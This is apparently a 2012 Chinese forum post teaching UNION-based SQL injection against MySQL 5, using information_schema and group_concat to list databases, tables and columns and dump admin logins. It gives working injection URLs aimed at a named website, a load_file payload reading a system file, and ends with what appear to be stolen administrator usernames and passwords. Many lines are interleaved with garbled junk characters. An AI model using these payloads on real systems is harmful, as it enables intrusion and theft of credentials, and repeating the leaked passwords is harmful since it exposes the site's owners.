此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似; n" J6 Q2 G/ G: y# ~6 k3 ]9 r
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
8 u4 X& v4 E6 c, }7 b' ]8 E- b7 D: o
. I* J5 b, R* v" D6 ]) A8 J: e+ P$ T" h2 w7 k/ u8 U
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
- d G' s* C8 G! o5 c. ?
% B# c* o+ v( b8 t; D! n H缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢..." ~- {* C" Q6 v& E9 q( Z; s1 J
% i2 P5 q7 S( i2 p! A& b
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
4 f9 z6 R9 ?% D1 D; a7 C( F在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
6 p' W) l: h- b' {! q% a' m6 p! d2 r+ C! o8 |4 C9 q* B+ C
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
1 R1 D/ X/ o+ y& _- M* Z3 ^3 o8 {0 i5 S" B8 L& N
读出所有库:' [' e" j) z4 K# W3 X
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
- p/ G; y2 i* e& V" w: w
" u- H3 C* \) B' s
: w, w, ^$ ?3 B; d& Z
9 L* q* @* Z; j+ [* X' f读出所有表:
( Z7 D) ^5 B) ?* b( Q4 W- dhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
/ t$ B' O6 W1 c) F4 I+ w& `% ~
% r; P/ ~- y/ S5 K4 G读出所有表字段:
( ~# T( S+ t9 \/ t3 `: a9 a/ bhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)0 w: k) ^% X) u |$ H5 u0 e
*/ (97,100,109,105,110)为admin的ascii码 依次类推
* a- Q# B! C% d+ d/ I
1 n. N9 O. G G2 I, z2 f6 {( a! Z读出所有表字段里的内容:
; B, s: s/ I5 `# l& f5 xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
- @' J1 q x# H" g! U, y
( h+ y# x$ @: J
& r9 h* U/ M2 _' b. c
! |* G1 Y8 D& C+ e3 A" }! n' w
6 q0 D7 ^. I! b: I
" d5 y" f) A, E3 o2 X) @9 ]6 x! f* P& `2 {
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
: s4 N- M- u3 y: U
7 A* J* P+ u! A" @ N3 s, g3 r& M1 c' J& n( l; s ~" s
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
$ W j- B% t. s b
1 p" J$ o( K1 s( [http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23+ [4 T3 `3 ]8 r( Q" x/ M
4 E9 O, Q1 [ x8 f, s) B
. U5 k& z' v/ G R+ f) I
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
3 H n& Y( } n& a
5 y" m9 c& r$ D* j P# O6 G- f! ?& D3 o0 v3 B# r/ @' h
webmaster:dzb521123,simlab:simadmin20043233
' k) `7 [. J' d g3 [- v' x |
发表于 2012-9-13 16:37:34
收藏
支持
反对